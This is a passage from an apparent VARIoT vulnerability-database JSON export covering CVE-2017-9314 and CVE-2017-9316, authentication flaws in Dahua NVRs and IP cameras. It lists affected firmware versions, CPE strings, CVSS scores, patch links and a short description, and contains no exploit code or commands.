"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
}
]
},
"last_update_date": "2023-12-18T13:24:17.002000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DHCC-SA-201711-002",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--authentication-vulnerability-found-in-some-dahua-nvr_14731_211.html"
},
{
"title": "Patches for multiple Dahua product access verification vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/108305"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "NVD",
"id": "CVE-2017-9314"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--authentication-vulnerability-found-in-some-dahua-nvr_14731_211.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9314"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9314"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"date": "2017-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"date": "2017-11-13T16:29:00.327000",
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"date": "2017-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"date": "2017-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"date": "2017-11-29T18:53:03.257000",
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"date": "2017-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua NVR Authentication vulnerabilities in model software",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
],
"trust": 0.6
}
}
VAR-201711-1048
Vulnerability from variot - Updated: 2023-12-18 13:14Firmware upgrade authentication bypass vulnerability was found in Dahua IPC-HDW4300S and some IP products. The vulnerability was caused by internal Debug function. This particular function was used for problem analysis and performance tuning during product development phase. It allowed the device to receive only specific data (one direction, no transmit) and therefore it was not involved in any instance of collecting user privacy data or allowing remote code execution. plural Dahua Technology The product contains authentication vulnerabilities.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. DahuaIPC-HDW4300S is the IP camera equipment of Dahua Company of China. The following products are affected: Dahua IPC-HDW4300S; NVR11HS; IPC-HFW4X00; IPC-HDW4X00; IPC-HDBW4X00;
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-1048",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.0.r.20150206"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.5.r.20170305"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.1.r.20150420"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.5.r.20160803"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.5.r.20161226"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.5.r.20160409"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.2.r.20150715"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.5.r.20170321"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.3.r.20150921"
},
{
"model": "nvr11hs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0000.5.r.20160603"
},
{
"model": "ipc-hfw4x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdbw4x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0005.0.r.20141205"
},
{
"model": "ipc-hfw5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hdbw5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hdw5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdbw4x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hfw4x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.240.0009.0.r.20131015"
},
{
"model": "ipc-hdw5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hdw4x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0000.0.r.20140419"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0008.0.r.20150710"
},
{
"model": "ipc-hf5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0002.0.r.20140724"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.0.r.20131231"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0002.0.r.20140621"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdw4300s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0007.0.r.20150409"
},
{
"model": "ipc-hdw4x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hdbw5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hf5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.3.r.20150312"
},
{
"model": "ipc-hfw5x00",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.420.0006.0.r.20150311"
},
{
"model": "ipc-hdbw4x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw5x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdw4300s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdw4x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdw5x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hf5x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw4x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw5x00",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr11hs",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-ipc-hdw1xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-ipc-hdw2xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-ipc-hdw4xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-ipc-hfw1xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-ipc-hfw2xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-ipc-hfw4xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-sd6cxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-nvr1xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-hcvr4xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security dh-hcvr5xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security nvr11hs",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.2.r.20150715:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.3.r.20150921:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20160409:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20160603:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.0.r.20150206:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20161226:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20170321:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.1.r.20150420:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20160803:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr11hs_firmware:3.210.0000.5.r.20170305:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr11hs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0005.0.r.20141205:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0007.0.r.20150409:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0008.0.r.20150710:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.240.0009.0.r.20131015:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0000.0.r.20140419:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0002.0.r.20140724:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.400.0000.0.r.20131231:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4300s_firmware:2.420.0002.0.r.20140621:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw4300s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw4x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw4x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw4x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw4x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw4x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw4x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw4x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hf5x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw5x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw5x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw5x00_firmware:2.420.0006.0.r.20150311:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw5x00_firmware:2.400.0000.3.r.20150312:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw5x00:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9316"
}
]
},
"cve": "CVE-2017-9316",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-9316",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-38226",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-117519",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-9316",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-9316",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-38226",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201705-1392",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-117519",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-9316",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "VULHUB",
"id": "VHN-117519"
},
{
"db": "VULMON",
"id": "CVE-2017-9316"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Firmware upgrade authentication bypass vulnerability was found in Dahua IPC-HDW4300S and some IP products. The vulnerability was caused by internal Debug function. This particular function was used for problem analysis and performance tuning during product development phase. It allowed the device to receive only specific data (one direction, no transmit) and therefore it was not involved in any instance of collecting user privacy data or allowing remote code execution. plural Dahua Technology The product contains authentication vulnerabilities.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. DahuaIPC-HDW4300S is the IP camera equipment of Dahua Company of China. The following products are affected: Dahua IPC-HDW4300S; NVR11HS; IPC-HFW4X00; IPC-HDW4X00; IPC-HDBW4X00;",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "VULHUB",
"id": "VHN-117519"
},
{
"db": "VULMON",
"id": "CVE-2017-9316"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
